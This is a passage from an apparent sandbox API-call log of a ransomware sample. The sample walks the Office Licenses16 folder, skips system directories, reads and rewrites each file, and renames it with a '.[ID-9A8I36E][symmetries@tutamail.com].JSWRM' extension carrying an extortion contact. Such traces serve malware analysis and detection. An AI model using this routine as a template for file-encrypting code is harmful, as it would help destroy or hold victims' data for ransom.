hHeap=0x1e0000) returned 1 [0108.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.422] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0108.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0108.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0108.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0108.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0108.423] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9ac2a76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9ac2a76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9bcdaf1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdR_OEM_Perp-pl.xrm-ms", cAlternateFileName="PRC692~1.XRM")) returned 1 [0108.424] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0108.424] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0108.424] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0108.424] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0108.424] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0108.424] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.424] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.424] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.424] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.424] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0108.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0108.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2412b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0108.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0108.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241308, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0108.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0108.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0108.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0108.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.425] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10655) returned 1 [0108.425] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0108.425] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0108.428] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.428] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0108.428] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.428] CloseHandle (hObject=0x45c) returned 1 [0108.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0108.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0108.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0108.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0108.429] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0108.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0108.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.429] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0108.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0108.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0108.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0108.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0108.430] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9b5b3c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9b5b3c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9c19fe7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5130, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="PR86DE~1.XRM")) returned 1 [0108.430] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0108.430] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0108.430] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0108.430] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0108.431] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.431] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.431] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.431] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.431] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.431] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0108.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0108.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0108.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0108.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0108.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0108.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0108.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0108.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0108.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0108.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.432] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20784) returned 1 [0108.432] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5130) returned 0x24c1d0 [0108.432] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5130, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5130, lpOverlapped=0x0) returned 1 [0108.436] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.436] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5130, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5130, lpOverlapped=0x0) returned 1 [0108.436] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.436] CloseHandle (hObject=0x45c) returned 1 [0108.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0108.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.436] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0108.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0108.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0108.437] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0108.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0108.437] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.437] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0108.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0108.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0108.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0108.438] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0108.438] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaee08b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeaee08b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb0d072a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d54, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="PRC1B5~1.XRM")) returned 1 [0108.438] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.438] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.439] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.439] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.439] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.439] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.439] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.439] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.439] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.439] lstrcmpiW (lpString1="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0108.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0d8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0108.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0108.439] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0108.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.440] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11604) returned 1 [0108.440] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0108.440] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0108.443] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.443] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0108.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.443] CloseHandle (hObject=0x45c) returned 1 [0108.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0108.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: 